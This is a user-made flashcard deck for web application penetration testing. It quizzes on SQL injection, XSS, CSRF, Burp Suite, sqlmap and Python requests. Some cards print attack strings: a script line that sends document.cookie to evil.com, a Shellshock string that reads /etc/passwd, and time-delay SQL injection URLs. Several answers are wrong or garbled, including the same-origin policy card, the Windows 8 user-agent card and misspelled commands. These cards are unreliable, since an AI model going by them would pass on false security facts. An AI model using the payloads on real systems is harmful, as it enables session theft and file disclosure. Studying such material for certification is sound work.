Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

Wapt > Test > Flashcards

Test Flashcards

1
Q

Why is the AJAX attack surface larger then that of static web pages

A

Client-side Code is included

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Which configuration option is used to select specific HTTP Request Parameters to modify when launching an attack with Burp intrude?
1. Repeater
2. Target
3. Payloads
4. Positions

A
  1. Positions
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is the flag for minimumword length in cewl

A

cewl -m #

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

an attacker sends a link to a victim that contains a website URI and session ID. The victim clicks the link and authenticates. what kind of attack is this setting up?
1. Session prediction
2. Cross site scripting
3. Cross site request forgery
4. Session fixation

A

Session Fixation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Which of the following document object contain hidden values and Cross SiteRequest Forgerty tokens which the web application developer would not want to be dispated on the web page.
1. Cookie
2. Forms
3. Tables
4. Referrer
5. URL

A

Forms

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

A user of the MySocialMedia.com site receives the following link in an email. which of the following would prevent this type of attack?
1. Requiring Client Certs
2. Use parametrized queries
3. Generate unique tokens
4. Set the Secure flag in cookies

A

Generate unique tokens

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Which snippet would most likely be found in an HTML injection attack?
1. 

alert("Success")

2. <form actions="http://2.4.3.5/login.htm">Password: <input></input><form>
3. <embed src=’http://example.com/demo.swf”></embed>
4.<?php inclued(“inc/”.$_GET[‘file’]);?>
A
  1. <form>Password: <input></input><form>
    </form></form>
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Which of the following is recommended for centralized web server and application logging
1. Synchronize each system that generates logs with NTP
2. Convert logs to UTC time one received by central repository
3. Synchronize NTP with the local time of each system that generates logs
4. Convert time stamps to epock format once received by central repo

A

Synchronize each system that generates logs with NTP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

A penetration tester is doing passive recon and needs to determine the IP address for the target’s primary web server. Which of the following would reveal the IP address for the server www.sans.org
1. authlookup www.sans.org
2. nslockup www.sans.org
3. resolve www.sans.org
4. whois www.sans.org

A

nslookup www.sans.org

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

what db scheme uses
all_tables

A

Oracle Database

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Which is a control against tampering with session id
1. Including a hash of the uname as part of session ID
2. Using both alphabetic and numeric characters in ses ID
3. Changing the ses ID after the user reloads page
4. Sending the session ID to the user as part of the cookie

A

changing the ses ID after the user reloads the page

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

What attack is this?
http://www.earth.com/gui/?action=add=url&s=/http://evilesite.com/union.torrent

A

Cross Site Request Forgery

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

what attack is
www.wind.com/login.php?id=1%27%20waitfor%20%delay%20%2700:00:15%27–

A

SQL Injection (waitfor delay 00:00:15 –) uri encoded

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

what attack is
**www.fire.com/page.asp?pageid=10&lang=eng&Title<h1>

1=1<\script>**
A

cross site scripting

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

what describes the relationship between succesful inline SQLi and reflective xss
1. Tester input special characters into cookies
2. takes advantage of a website that trusts the user browser
3. In both cases results are displayed to the user
4. Ses ID must match between the request and the response

A

In both cases the results are displayed to the user

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What python request.get attribute shows if a server returned an error
1. print (pageload.headers)
2. print (pageload.stderr)
3. print (pageload.txt)
4.print (pageload.status_code)

A

print (pageload.status.come)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

what must match to use the UNION SELECT statement in a SQLi test

A

The number of columns returned must match the number of the original SELECT statement

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

what vuln is this
HTTP/1.1 401 Authorizatoin Required WWW-Authenticate: Digest realm=sans.org

  1. Ldap injection is possible due to win authentiaction
  2. HTTP headers contain weakly encoded username and pass
  3. Password Guessing attack are possible due to lack of lockout
  4. Client request contain digital signatures that can be spoofed.
A
  1. Password Guessing attack are possible due to lack of lockout
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

what MySQL function to read a file located on the db server as part of an SQLi attack?
1. sp_configure
2. Bulk Insert
3. load_file
4. Copy
5. utl_file

A

3 load_file

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

What tool is useful for finding info about technologies in use by a websiet, the server os, netblock owner, historical info about the site?
1. Qualys server test
2. Netcat
3. Shodan
4. Netcraft

A
  1. Netcraft
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

what tool would be used to import web services API’s prior to a penetration testing?

A

Postman

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

What Python construct can be used to iterate through an entire list of values without ref to individual indexes?
1. Case Statement
2. While loop
3. If Statement
4. For loop

A
  1. For loop
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Why would an attacker avoid using the DOM object show below if he was trying to hijack a user’s session to www.bank.com?
location = ‘http://www.evil.com/evil_script/evil.php?=’+document.cookie
1. It would redirect the victims browser to a different web page
2. the script would steal cookies from the wrong web site
3. The script would be unable to read data in hidden fields
4. It would prompt the user to re-enter his account informaton

A
  1. it redirect to evil.com
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

enumerate a db for valid users in sqlmap

A

sqplmap -u “http:/www.site.com” –users

25
Q

Which could be successful if used to initiate a SQLi attack against a web app with little or no input filtering
1. – or 1=1
2. “ or 1=2
3. <”Yes”=”Yes
4. ‘or’John’=’john
5. ‘or 2<1 –

A
  1. ‘or’John’=”john
26
Q

What command switch could be added to wget to force cataloguing pages that are referenced in the robots.txt?
1. -e robots=off
2. -e cache
3. -e index
4. -e follow

A
  1. -3 robots=off
27
Q

What is the linux syntax to read a base 64 file.

A

cat filename.txt | base64 -d

28
Q

What makes the tool sqlmap an attractive blind SQL injection utility?
1. It runs on systems that support Python and is highly effective
2. It is bundled with Grendel-scan and includes an interception proxy
3. It is bundled with the the Burp Suite and utalizes the Google Cache
4. It targets Microsoft SQL Servers and runs solely in VBS code

A
  1. It runs on systems that support Python and is highly effective
29
Q

Which of the following will give an attacker the web root directory and the UID of the we server?
1. www.giac.org/robots.txt
2. www.mysite.com/phpinfo.php
3. HTTP_USER_AGENT environment variable
4. /usr/bin/id command

A
  1. www.mysite.com/phpinfo.php
    (phpinfo.php reveals:
    -PHP configuration file and directory plus underlying directory structure
    -Username and UID of the web server
    -Web root location
    -Version of software, such as MYSQL
30
Q

Which readyState value indicates that an XMLHttpRequest issued the HTTP request over the network?
4
3
2
1

A

2
(XMLHttpRequest)
0=Unsent
1=Opened
2=Sent
3=Loading
4=Done

31
Q

Removing known-bad character from user input to a Web application help prevents which of the following?
1. Cross-Site Scripting
2. Block-list filtering
3. Cross-Site Request Forgery
4. Session Hijacking

A

1 Cross-Site Scripting
(Removing Known-bad input characters (which is itself known as block-list filtering) helps prevent XSS attacks.

32
Q

What HTTP Status code means “Switching Protocols,” and is commonly used by Websocket?
1. 100
2. 101
3. 200
4. 302
5. 304
6. 401
7. 404
8. 500
9. 502

A
  1. 101
33
Q

This is a legitmate (non-forged) user-agent string:
Mozilla/5.0 (Windows NT 5.2: Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.166.7.0 Safari/537.36
What is the client OS?
1. Windows 10
2. Windows 7
3. Windows 8
4. Windows 8.1
5. Windows Vista
6. Windows XP

A
  1. Wndiows 8
34
Q

Examine the following sting:
() { 42;};echo;/bin/cat /etc/passwd
What is the name of this vunlerability this sting is attempting to exploit?

A

Shellshock

35
Q

When Burp suit fuzzing attack fuzzes each postion, one at a time?
1. Batering Ram
2. Cluster Bome
3. Pitchfork
4. Sniper

A
  1. Sniper
36
Q

Here is the dig PTR (reverse) DNS lookup:
dig 23.1.16.19.in-addr.arpa PTR
What is the simplified syntax of this command?
1. dig -p 19.16.1.23
2. dig -ptr 19.16.1.23
3. dig -4 19.16.1.23
4. dig -x 19.16.1.23

A
  1. dig -x 19.16.1.23
37
Q

What property of the XMLHttpRequest object provides information about the state of the server’s response to a request sent via XMLHttpRequest?

A

reayState

38
Q

What type of atack is this?
“imag src=”http://ex.com/transfer.php?amount=1000.0&to_account=29520311”“
1. Commandline injection
2. CSRF
3. SQL Injection
4. XSS
5. Iframe Injection

A
  1. CSRF
39
Q

What is an ANSI SQL92 standard database that provides a way to easily query the names of
databases, tables, and even columns? It is supported by both Microso􀀂 SQL Server and MySQL,
but not Oracle, DB2 or SQLite.

A

information_schema

40
Q

What color icon does BeEF use to indicate “the command module works against the target, but
may be visible to the user”? Answer with one word, first le􀀅er capitalized. For example: “Black”
without the quotes.

A

Orange

41
Q

Which of the following options can be set to prevent XSS from stealing cookie data?
1. HTTPOnly = True
2. SecureFlag = True
3. Hidden from fields = True
4. CookieReadOnly = False

A
  1. HttpOnly = True
42
Q

Which of the following is most likely to be the victim of an XSS vulnerability?
1. Web applications
2. Host systems
3. End Users
4. System administrators

A
  1. End User
43
Q

Which of the following attacks bypasses traditional server-side security controls such as input sanitiation or IDS?
1. Persistent XSS
2. DOM-based XSS
3. Reflected XSS
4. Stored XSS

A
  1. Dom Based XSS

In traditional reflected and stored XSS the goal is for the attacker to get the server side of the application to deliver the malicious JavasScript to the client.

44
Q

What type of XSS does not need to first deliver payload to the server?
1. DOM-based XSS
2. Stored XSS
3. Self-XSS
4. Reflected XSS

A
  1. DOM-based XSS
45
Q

With respect to HTTP request methods, which of the following is considererd unsafe as well as non-idempotent?
1. HEAD
2. GET
3. POST
4. PUT

A

Post
*Repeated submissions of an idempotent method yeild same end server sate:
-Idempotent methods: GET, HEAD, PUT, DELETE, OPTIONS
-Non-Idempotent methods: POST,PATCH

46
Q

Which of the following MITRE database searches canprove useful for discovering information leakage and related flaws?
1. CVE’s referencing “flaws”
2. CVE’s referencing “directory”
3. CVE’s referencing “exposures”
4. CVE’s referencing “transparent”

A
  1. CVE’s Referencing “directory”
47
Q

The most common way to attempt to discover SQL input processing flaws withing a web application with a back end database is to do what?
1. inputs that are likely to cause an error from the JOBOSS app server
2. inputs that are likely to cause parsing errors on the web page server engine
3. Inputs that are likely to cause an error on the operating system
4. inputs that are likely to cause a database processing error

A
  1. inputs that are likely to cause a database processing error.
48
Q

What kind of attack was used by malicious parties in the Drupalgeddon exploit?
1. LFI
2. SQL Injection
3. CSRF
4. Stored XSS

A

SQL Injection
SQL injection, specifically unauthenticated SQL injection, was used in the Drupalgeddon attack. Exploitation of this vulnerability, which proved straightforward, would provide adversaries unfettered access to the entire CMS, potential for privilege escalation, and the ability to execute arbitrary PHP. Drupal gave this vulnerability its highest (worst) possible rating. Book 5 Page 73

49
Q

Burp provides three levels of confidence for its findings. What is the lowest level of confidence that Burp assigns to vulnerabilities?
1. Low
2. Weak
3. Minimal
4. Tentative

A

Tentative

50
Q

Burp provides three levels of confidence for its findings. What is the highest level of confidence that Burp assigns to vulnerabilities?
1. Verified
2. Certain
3. High
4. Confirmed

A

Certain

51
Q

What data structure does r.headers return in the following code?

r = requests.get(‘http://www.sec542.org’)
print r.headers
1. Dictionary
2. List
3. String
4. Integer

A

Dictionary

52
Q

! /usr/bin/python3

What is the output of the following Python program?

s = {1:’a’, 2:’b’, 3:’c’}
print (len(s))
1
3
6
0

A

3

”s” defines a dictionary with three key:value pairs. The len() function counts the number of pairings within a dictionary—in this case, 3. Book 5 Page 30

53
Q

Which of the following flaws is exploited by a CSRF attack?
Responses

  1. Lack of a dynamic element in a transaction
  2. Lack of authentication of a transaction
  3. Lack of user input validation
  4. Lack of authorization of a transaction
A
  1. Lack of dynamic element in transaction

Lack of authentication/authorization is not applicable as the attack requires the “victim” to be “logged in.” Similarly, lack of user input validation is not applicable as the attack does not rely on modification of user input such as in the case of an SQL injection attack. Book 5 Page 8

54
Q

! /usr/bin/python3

What output is generated from the following Python program?

t = 1
for a in [2,4]:
t = t + a
print (t)
Responses

10
7
3
6

A

7

The for loop iterates on the list containing two elements (2 and 4). Adding them to the initial value of t, 1, results in a final result of 7. Book 5 Page 29

55
Q

Short POST options can be sent via a parameter called data in the requests.post() function. What type of data structure is the data parameter?
Responses

  1. List
  2. Dictionary
  3. String
  4. Tuple
A
  1. Dictionary

POST options are sent via a dictionary called data in {‘variable’:’value’} format. Multiple variables can be passed: data = {‘variable1’:’value1’, ‘variable2’:’value2’}. Book 5 Page 34

56
Q

what must be set when using r=requests if a site is using a self-signed x.509 cert?

A

,verify=False

57
Q

What is the purpose of same-origin policy?

  1. To allow use of scripts across websites where there is a common domain name. This allows scripts to be run from the Origin webserver and any server that shares the root domain name of the server.
  2. To prevent a website’s scripts from accessing and interacting with scripts used on other servers unless all of the script content came exclusively from the Origin server.
  3. To prevent a website’s scripts from accessing data used on other websites unless the script content came from the Origin website or the script content was linked to on other websites.
  4. To allow use of scripts across websites where there is a common IP subnet. This allows scripts to be run from the Origin webserver and any server that shares the IP subnet as the server.
A
  1. To allow use of scripts across websites where there is a common domain name. This allows scripts to be run from the Origin webserver and any server that shares the root domain name of the server.
58
Q

Which of the following best describes the use of UNION-based SQL injection when trying to test an application for SQL injection vulnerabilities?
Responses

  1. It allows the attacker to queue multiple database queries in different web sessions with the application, with the last session causing triggering of all queued DB statements to be executed together.
  2. It allows the attacker to pull error information for both the database and application server and combine the results into a single output.
  3. It allows the attacker to pull information from multiple tables, using two or more SELECT statements, and to combine the results into a single table with a UNION operator, all in a single command.
  4. It allows the attacker to pull information from multiple tables by taking results of two or more separately executed SELECT statements and combining them.
A
  1. It allows the attacker to pull information from multiple tables, using two or more SELECT statements, and to combine the results into a single table with a UNION operator, all in a single command.
59
Q

Per the OWASP Testing Guide, which of the following is known as an HTTP verb tampering attack?
Responses
1. Alter request parameters
2. Change request payload
3. Change request method
4. Manipulate query string

A
  1. Change request method

Wapt (2 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions